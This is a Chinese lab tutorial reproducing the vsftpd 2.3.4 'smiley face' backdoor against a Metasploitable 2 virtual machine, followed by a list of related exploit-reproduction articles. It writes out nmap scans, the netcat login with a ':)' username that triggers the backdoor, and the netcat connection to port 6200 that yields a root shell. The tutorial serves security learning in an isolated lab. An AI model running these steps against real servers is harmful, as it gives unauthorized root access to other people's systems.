目录

一、Ftp笑脸漏洞原理

二、环境搭建

三、漏洞复现

一、Ftp笑脸漏洞原理

在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root

二、环境搭建

攻击机:kali-linux-2022.2(IP:192.168.50.133/24)

靶机:metasploitable-linux-2.0.0(IP:192.168.50.190/24)

靶机metasploitable-linux-2.0.0下载地址:https://pan.baidu.com/s/1cB2yKSEZvU9ajU4IeU8pCw

提取码:8888

1、metasploitable-linux-2.0.0下载完成后解压到电脑,然后使用VMware直接打开

2、使用普通用户msfadmin ,密码msfadmin 进行登录,修改root密码

msfadmin@metasploitable:~$ sudo passwd root

三、漏洞复现

1、开启metasploitable-linux-2.0.0虚拟机,在kali上打开一个终端,使用kali的nmap对靶机进行端口扫描,发现靶机开放了21 ftp端口

nmap 192.168.50.190

2、使用nmap扫描FTP服务的版本信息

nmap -sV 192.168.50.190

3、利用瑞士小军刀(netcat),连接靶机的21端口,输入user带有:),pass随便输入,注意:这里需要手动输入,此时靶机的6200端口开启,完成后请勿关闭此终端,保持下图的这个状态,不然6200端口也会随之关闭

例如:user a:) pass 111111

nc 192.168.50.190 21

4、在kali上另起一个终端, 用nmap扫描端口6200,观察端口打开情况

nmap -p 6200 192.168.50.190

5、用nc连接6200端口,成功以root身份登入,漏洞复现完毕

netcat 192.168.50.190 6200

笑脸漏洞(VSFTP2.3.4)复现相关推荐

  1. python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)

    警告 请勿使用本文提到的内容违反法律. 本文不提供任何担保 一.漏洞介绍 vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 ...

  2. [系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  3. SSH协议弱加密算法漏洞的利用及复现(中间人攻击)

    SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...

  4. NetLogon特权提升漏洞(CVE-2020-1472)复现及问题解决

    NetLogon特权提升漏洞(CVE-2020-1472)复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020 ...

  5. vsftpd2.3.4笑脸漏洞

    vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞.虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本.这个后门的载荷以 :)字符的形式拼接在用户名 ...

  6. 实现笑脸漏洞vsftpd2.3.4

    靶机metasploitable 默认登录账号和密码都是:msfadmin 登录后查看靶机IP:192.168.80.130 打开kali首先输入sudo su ,输入当前用户密码即可切换root,利 ...

  7. wordpress 4.6任意命令执行漏洞(PwnScriptum)复现

    今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为 ...

  8. Microsoft Office MSDT代码执行漏洞(CVE-2022-30190)复现“没”成功

    Microsoft Office MSDT代码执行漏洞(CVE-2022-30190)复现没成功 参考链接 https://github.com/chvancooten/follina.py http ...

  9. 【vulhub】Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)复现与反思!

    特征 1.8090端口 2.confluence图标(如图所示) 搭建环境 搭建confluence看这4篇教程,该cve搭建是用Confluence Server, 但是tm就是没有Confluen ...

最新文章

  1. SDUT_2118 数据结构实验之链表三:链表的逆置
  2. Mongodb 与sql 语句对照
  3. mysql8.0.20安装教程linux_Linux下安装mysql-8.0.20的教程详解
  4. 忠言多少有些逆耳,创业的九条真经
  5. 了解SQL Server中的GUID数据类型
  6. 敏捷开发用户故事系列之八:验收标准
  7. Gitlab+Git实现版本控制系统
  8. LabView学习笔记(八):属性节点
  9. MYSQL SHOW VARIABLES简介
  10. kettle实现颗粒度转换
  11. 会计实务综合模拟计算机实训心得,模拟企业会计实训心得体会
  12. 《STL源码分析》学习笔记 — STL概论与版本简介
  13. 怎么讲计算机屏幕录制,电脑如何录制屏幕
  14. [Echarts][全网唯一]X轴axisLabel随文字长度自动旋转的实现思路
  15. 针对ESXI5.5 本地磁盘分区丢失的解决方法,
  16. OSChina 周二乱弹 ——室友开始买假发女装了
  17. 【论文阅读】Rotom: A Meta-Learned Data Augmentation Framework for Entity Matching
  18. 华为高管丁耘跑28公里后突发疾病去世:在公司工作26年
  19. 一封来自大佬的密信待查收
  20. 声音文件大小的计算方法

热门文章

  1. Charles4.0最新版破解
  2. [pwn]gdb-peda调试
  3. PowerPoint2003上嵌入Excel Sheet
  4. Visual C++ 6.0 操作PowerPoint 2003
  5. 那些整天脸上都挂着笑容的人,你真的了解他们吗
  6. 万众期待: iebook超级精灵2008电子杂志制作套件全球发布
  7. Unity_Shader高级篇_14_Unity Shader入门精要
  8. PCQQ ECDH算法C++实现
  9. 【vue开发基础】之Vue实现导入导出文件功能(基于饿了么UI)(二)
  10. 如何开发辅助决策系统?